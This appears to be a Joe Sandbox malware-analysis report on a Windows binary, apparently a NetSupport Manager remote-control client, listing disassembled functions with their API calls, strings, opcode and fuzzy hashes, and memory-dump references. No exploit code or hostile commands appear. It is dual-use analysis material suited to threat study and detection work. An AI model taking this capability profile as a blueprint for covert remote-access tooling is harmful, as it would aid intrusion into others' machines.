                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                        • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                        • API String ID: 1594747848-1114959992
                                                                                        • Opcode ID: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                        • Instruction ID: 5297cf036ba1cbd73fc44df567c8a611b910eb11675e7325f2afb4d5e36916b9
                                                                                        • Opcode Fuzzy Hash: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                        • Instruction Fuzzy Hash: C4316275E10219ABDB149FF58C85FAFFBB8EB48709F100529FA25B7284D67469008BA4
                                                                                        Function 1102CC10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 284servicesleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102DD98,00000000,1B492F88,?,00000000,00000000), ref: 1102CE44
                                                                                        • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CE5A
                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CE6E
                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE75
                                                                                        • Sleep.KERNEL32(00000032), ref: 1102CE86
                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE96
                                                                                        • Sleep.KERNEL32(000003E8), ref: 1102CEE2
                                                                                        • CloseHandle.KERNEL32(?), ref: 1102CF0F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                        • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                        • API String ID: 83693535-2077998243
                                                                                        • Opcode ID: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                        • Instruction ID: 880dc79335238c7f7dd8ff78cda89552a6d5dde84d0873ba54ec41c4173cff75
                                                                                        • Opcode Fuzzy Hash: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                        • Instruction Fuzzy Hash: 27B19475E012259FDB25DFA4CD80BEDB7B5BB48708F5041E9E919AB381DB70AA80CF50
                                                                                        Function 11132BF0 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 11132C60
                                                                                        • GetTickCount.KERNEL32 ref: 11132C91
                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                        • GetTickCount.KERNEL32 ref: 11132CAC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$FolderPathwsprintf
                                                                                        • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                        • API String ID: 1170620360-4157686185
                                                                                        • Opcode ID: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                        • Instruction ID: 1138b9c1199a8041912b1953dd267279d987a2a799c8ea79b9a25deb6d60bab0
                                                                                        • Opcode Fuzzy Hash: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                        • Instruction Fuzzy Hash: F33157BAE4022E67E700AFB0AC84FEDF36C9B9471EF1000A9E915A7145EA72B545C761
                                                                                        Function 111450A0 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                        • _memset.LIBCMT ref: 1114512D
                                                                                          • Part of subcall function 11143000: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                        • _strncpy.LIBCMT ref: 111451FA
                                                                                          • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 11145296
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                        • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                        • API String ID: 3299820421-2117887902
                                                                                        • Opcode ID: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                        • Instruction ID: 1fcbe558ef897eaa1b38a7330f4b62b9d1ba330f7a3c6d488077e096d0eda0f8
                                                                                        • Opcode Fuzzy Hash: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                        • Instruction Fuzzy Hash: 6D51D9B1E0022BEFEB51CF60CD41F9EF7B9AB04B08F104199F519A7941E7716A48CB91
                                                                                        Function 11026BA0 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _strtok.LIBCMT ref: 11026C26
                                                                                        • _strtok.LIBCMT ref: 11026C60
                                                                                        • Sleep.KERNEL32(1102FC53,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11026D54
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _strtok$Sleep
                                                                                        • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                        • API String ID: 2009458258-3774545468
                                                                                        • Opcode ID: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                        • Instruction ID: 546c7fd96e7e5c201e62e0728b24f9c1e86d1f0ab762c79c207aecf2c2ec1ca9
                                                                                        • Opcode Fuzzy Hash: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                        • Instruction Fuzzy Hash: A951F375E0525E9BDF11EFA9CC80BBEFBB5EB84308FA44069DC1167284E631A846C742
                                                                                        Function 11102C50 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 11102C6C
                                                                                        • GetThreadDesktop.USER32(00000000), ref: 11102C73
                                                                                        • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11102C83
                                                                                        • SetThreadDesktop.USER32(00000000), ref: 11102C90
                                                                                        • CloseDesktop.USER32(00000000), ref: 11102CA9
                                                                                        • GetLastError.KERNEL32 ref: 11102CB1
                                                                                        • CloseDesktop.USER32(00000000), ref: 11102CC7
                                                                                        • GetLastError.KERNEL32 ref: 11102CCF
                                                                                        Strings
                                                                                        • SetThreadDesktop(%s) ok, xrefs: 11102C9B
                                                                                        • OpenDesktop(%s) failed, e=%d, xrefs: 11102CD7
                                                                                        • SetThreadDesktop(%s) failed, e=%d, xrefs: 11102CB9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                        • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                        • API String ID: 2036220054-60805735
                                                                                        • Opcode ID: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                        • Instruction ID: e6b285a79aa3308c0e4e86645e8e2c70f1a73097c1882eeb774c19519f5c9288
                                                                                        • Opcode Fuzzy Hash: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                        • Instruction Fuzzy Hash: 5D11C679A042167BE7086BB15C89FBFFA2DAFC571CF051438F91786545EE24B40483B6
                                                                                        Function 1115E380 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115E3A8
                                                                                        • GetLastError.KERNEL32 ref: 1115E3B5
                                                                                        • wsprintfA.USER32 ref: 1115E3C8
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                        • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115E40C
                                                                                        • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115E419
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                        • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                        • API String ID: 1734919802-1728070458
                                                                                        • Opcode ID: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                        • Instruction ID: 2151ae3f148807adf1b9b51829e7bc1db46dc9b6ec15270657221fcdabbc1952
                                                                                        • Opcode Fuzzy Hash: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                        • Instruction Fuzzy Hash: 1B110479A01319ABC720EFE69C84A96F7B4FF2231CB40822EE46543240DA706944CB51
                                                                                        Function 111100D0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • std::exception::exception.LIBCMT ref: 1111013A
                                                                                        • __CxxThrowException@8.LIBCMT ref: 1111014F
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                        • InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                        • InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                        • EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                        • LeaveCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111024F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                        • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                        • API String ID: 1976012330-1024648535
                                                                                        • Opcode ID: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                        • Instruction ID: 7e481d80fa827a07ee7257280804c30d2ae959ce5d98406b053f8524d928f6e4
                                                                                        • Opcode Fuzzy Hash: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                        • Instruction Fuzzy Hash: 6C41C2B5E00216AFDB11CFB98C84BAEFBF5FB48708F00453AE815DB244E675A944CB91
                                                                                        Function 110607F0 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 289registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,1117F505,00000000,00000000,1B492F88,00000000,?,00000000), ref: 11060874
                                                                                        • _malloc.LIBCMT ref: 110608BB
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,1B492F88,00000000), ref: 110608FB
                                                                                        • RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11060962
                                                                                        • _free.LIBCMT ref: 11060974
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                                        • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                        • API String ID: 999355418-161875503
                                                                                        • Opcode ID: 25c6060889b0532266d56abace0ba5fbfa4960398331d3b945ebf36f5c2f89a7
                                                                                        • Instruction ID: c47c75eefe38bee888b154a00c4449ad07b8701d7df13cace45a3bfee881b040
                                                                                        • Opcode Fuzzy Hash: 25c6060889b0532266d56abace0ba5fbfa4960398331d3b945ebf36f5c2f89a7
                                                                                        • Instruction Fuzzy Hash: E3A1B075A007469FE721CF64C880BABFBF8AF45308F044A5CE99697684E770F508CBA1
                                                                                        Function 1115BA20 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,1B492F88,00000000,?), ref: 1115BA67
                                                                                        • CoCreateInstance.OLE32(111C4FEC,00000000,00000017,111C4F1C,?), ref: 1115BA87
                                                                                        • wsprintfW.USER32 ref: 1115BAA7
                                                                                        • SysAllocString.OLEAUT32(?), ref: 1115BAB3
                                                                                        • wsprintfW.USER32 ref: 1115BB67
                                                                                        • SysFreeString.OLEAUT32(?), ref: 1115BC08
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
